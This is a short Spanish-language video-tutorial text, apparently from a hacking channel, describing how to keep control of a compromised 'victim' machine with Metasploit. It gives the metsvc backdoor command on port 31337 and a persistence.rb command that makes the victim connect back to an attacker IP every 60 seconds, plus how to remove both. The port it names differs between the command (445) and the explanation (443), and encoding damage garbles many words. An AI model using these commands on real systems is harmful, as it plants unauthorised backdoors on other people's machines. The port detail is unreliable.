En anteriores videos habíamos ya adelantado un poco sobre metasploit, en este caso vamos a hablar de dos scrips de esta herramienta el cual nos permite mantener nuestra conexión con la victima luego de haberse reiniciado la máquina.

Con el comando run metsvc  vamos a dejar una puerta trasera en la maquina victima el cual vamos a poder conectarnos configurando un handler con el puerto 31337. Aunque esto solo nos va a permitir si la vĂ­ctima no se encuentra detrás de un firewall.

Aunque el otro mĂ©todo a utilizar no necesitamos esa caracterĂ­stica de nuestra vĂ­ctima. Tan solo con el comando run persistence.rb –x –i 60 –p 445 –r (ip atacante) vamos a establecer una conexiĂłn más segura.
Esto significa que cada 60 segundos la máquina de la víctima se intentara conectar al puerto 443 en la dirección del atacante donde estará nuestro handler a la escucha.


Para eliminar la persistencia en el caso de metsvc puedes desde una Shell de meterpreter con el comando metsvc –r pero el servicio de persistence.rb no. Tendremos que eliminar las claves de autorun del registro y matar el proceso wscript.exe.

Facebook:


SuscrĂ­bete al canal para mas videos!!